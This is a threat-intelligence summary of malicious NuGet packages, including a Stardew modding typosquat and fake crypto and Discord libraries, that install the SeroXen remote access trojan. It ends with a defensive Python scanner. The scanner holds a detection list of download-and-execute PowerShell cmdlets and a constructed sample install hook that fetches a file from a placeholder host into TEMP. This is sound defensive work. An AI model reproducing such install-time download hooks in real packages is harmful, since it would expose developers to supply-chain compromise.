A user named Disti has published malicious NuGet packages on the package manager for the .NET Framework. These packages include a typosquat of a legitimate package and several others that masquerade as crypto service libraries but actually deploy a remote access trojan (RAT). The discovery of these malicious packages highlights the exploitation of open-source ecosystems by attackers [6].

Description

A user named Disti has uploaded malicious NuGet packages on the package manager for the .NET Framework. One of these packages [3], called Pathoschild.Stardew.Mod.Build.Config [1] [2] [5] [6], is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig [1] [2] [5] [6]. The malicious variant has artificially inflated its download count to surpass 100,000 downloads [2] [5] [6]. Disti has also uploaded six other packages that pretend to be crypto service libraries but actually deploy the SeroXen remote access trojan (RAT).

The attack chain begins with the installation of the package through a PowerShell script [2] [5] [6]. This script downloads a heavily obfuscated Windows Batch script [2] [5], which is responsible for constructing and executing another PowerShell script to deploy the SeroXen RAT [5]. The SeroXen RAT is a fileless RAT that combines the functions of Quasar RAT [2] [5] [6], the r77 rootkit [2] [5] [6], and NirCmd [2] [5] [6].

Furthermore, additional malicious NuGet packages have been discovered that impersonate crypto wallets [3], crypto exchanges [3] [4], and Discord libraries [3] [4]. These packages were also uploaded by the user named Disti and contain an XML file that downloads an obfuscated Windows Batch file to carry out malicious activities [3]. It is important to note that the download numbers for these packages may be inflated and do not necessarily reflect their actual reach in the NuGet community.

These malicious NuGet packages have gained significant attention, with over 2 million downloads [4], as they are being used to distribute the SeroXen RAT. They specifically target developers by impersonating popular crypto wallets, crypto exchanges [3] [4], and Discord libraries [3] [4]. The installation process involves the execution of PowerShell scripts that download and execute CMD and Batch files from external URLs [4]. One of the downloaded files [4], named 'x.bin', is an obfuscated Batch script with over 12,000 lines [4]. Its purpose is to construct and execute another PowerShell script [4]. The final script decrypts and decompresses an encoded payload [4], which is identified as the SeroXen RAT [4]. This RAT is marketed as a legitimate program and is sold for a monthly fee or a one-time purchase [4]. It is gaining popularity among cybercriminals due to its low detection rates and powerful capabilities [4].
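The two defensive checks that follow from the description above (a typosquat whose ID differs from the legitimate one only in where the dots fall, and a package whose installation runs a PowerShell script that fetches a file from an external URL) can both be automated before a package is allowed into a build. The script below is an added example written for this summary; it is not code from any of the referenced reports or from NuGet itself. It assumes that the install-time hook is a `tools/init.ps1`, `tools/install.ps1` or `tools/uninstall.ps1` script inside the `.nupkg` (which is a ZIP archive), that the allow-list `KNOWN_GOOD` is maintained by the reader, and it builds a constructed sample package in memory so that it runs offline; the URL inside the sample script is a placeholder, not an indicator from the page.

```python
import io
import re
import zipfile
from difflib import SequenceMatcher

# Constructed allow-list: the package IDs a project actually depends on.
KNOWN_GOOD = ["Pathoschild.Stardew.ModBuildConfig", "Newtonsoft.Json"]

# NuGet install-time PowerShell hooks (assumed layout: tools/<hook>.ps1).
INSTALL_SCRIPT_RE = re.compile(r"^tools/(init|install|uninstall)\.ps1$", re.IGNORECASE)

# Cmdlets and .NET members commonly used to fetch and run remote content;
# their presence in an install hook is a review trigger, not a verdict.
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|DownloadFile|DownloadString|Invoke-Expression|\biwr\b|\biex\b)",
    re.IGNORECASE,
)


def normalize_id(package_id: str) -> str:
    """Strip separators so IDs that differ only in dot placement collide."""
    return re.sub(r"[._-]", "", package_id).lower()


def typosquat_candidates(package_id: str, known_good, threshold: float = 0.9):
    """Return allow-listed IDs that `package_id` looks like but is not.

    Two signals: identical after separator removal (the Mod.Build.Config
    case), or a high character-level similarity ratio.
    """
    hits = []
    for good in known_good:
        if good.lower() == package_id.lower():
            continue  # exact match is the legitimate package, not a squat
        separators_only = normalize_id(good) == normalize_id(package_id)
        ratio = SequenceMatcher(None, good.lower(), package_id.lower()).ratio()
        if separators_only or ratio >= threshold:
            hits.append(good)
    return hits


def scan_nupkg(nupkg_bytes: bytes):
    """List install hooks in a .nupkg and the download/exec indicators they use."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as zf:
        for name in zf.namelist():
            if not INSTALL_SCRIPT_RE.match(name):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            indicators = sorted({m.group(0) for m in DOWNLOAD_RE.finditer(text)})
            findings.append({"script": name, "indicators": indicators})
    return findings


def build_sample_nupkg() -> bytes:
    """Constructed sample: a typosquat ID with an init.ps1 that fetches a file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Pathoschild.Stardew.Mod.Build.Config.nuspec", "<package/>")
        zf.writestr("lib/net6.0/placeholder.dll", b"")
        # Placeholder URL; the real campaign's hosts are not reproduced here.
        zf.writestr(
            "tools/init.ps1",
            "$u = 'https://example.invalid/x.bin'\n"
            "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\x.bin\")\n",
        )
    return buf.getvalue()


def review_package(package_id: str, nupkg_bytes: bytes, known_good=KNOWN_GOOD):
    """Combine both checks into one verdict a CI gate can act on."""
    squats = typosquat_candidates(package_id, known_good)
    hooks = scan_nupkg(nupkg_bytes)
    risky_hooks = [h for h in hooks if h["indicators"]]
    return {"typosquat_of": squats, "install_hooks": hooks, "block": bool(squats or risky_hooks)}


if __name__ == "__main__":
    sample = build_sample_nupkg()
    print(review_package("Pathoschild.Stardew.Mod.Build.Config", sample))
```

Because inflated download counts are cited as part of the lure, the gate deliberately ignores popularity and keys only on the package ID and on what the archive actually executes at install time; a package that fails either check is held for manual review rather than rejected silently, so that a legitimate rename does not break a build without explanation.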

Conclusion

The discovery of these malicious NuGet packages highlights the vulnerability of open-source ecosystems to exploitation by attackers. It is crucial for developers to be cautious when downloading and installing packages, especially those impersonating popular crypto wallets, crypto exchanges [3] [4], and Discord libraries [3] [4]. Mitigations should include verifying the legitimacy of a package and its publisher rather than trusting its download count, which can be inflated, as well as keeping security tooling up to date. The use of fileless RATs like SeroXen RAT poses a significant threat due to their low detection rates and powerful capabilities. As cybercriminals continue to exploit open-source ecosystems, it is important for the community to remain vigilant and proactive in protecting against such attacks.

References

[1] https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/
[2] https://api-security.blog/2023/10/12/malicious-nuget-package-targeting-net-developers-with-seroxen-rat/
[3] https://cyber.vumetric.com/security-news/2023/10/12/malicious-solana-kucoin-packages-infect-nuget-devs-with-seroxen-rat/
[4] https://summamoney.com/investing/the-daily/malicious-solana-kucoin-packages-infect-nuget-devs-with-seroxen-rat/
[5] https://patabook.com/technology/2023/10/12/malicious-nuget-package-targeting-net-developers-with-seroxen-rat/
[6] https://thehackernews.com/2023/10/malicious-nuget-package-targeting-net.html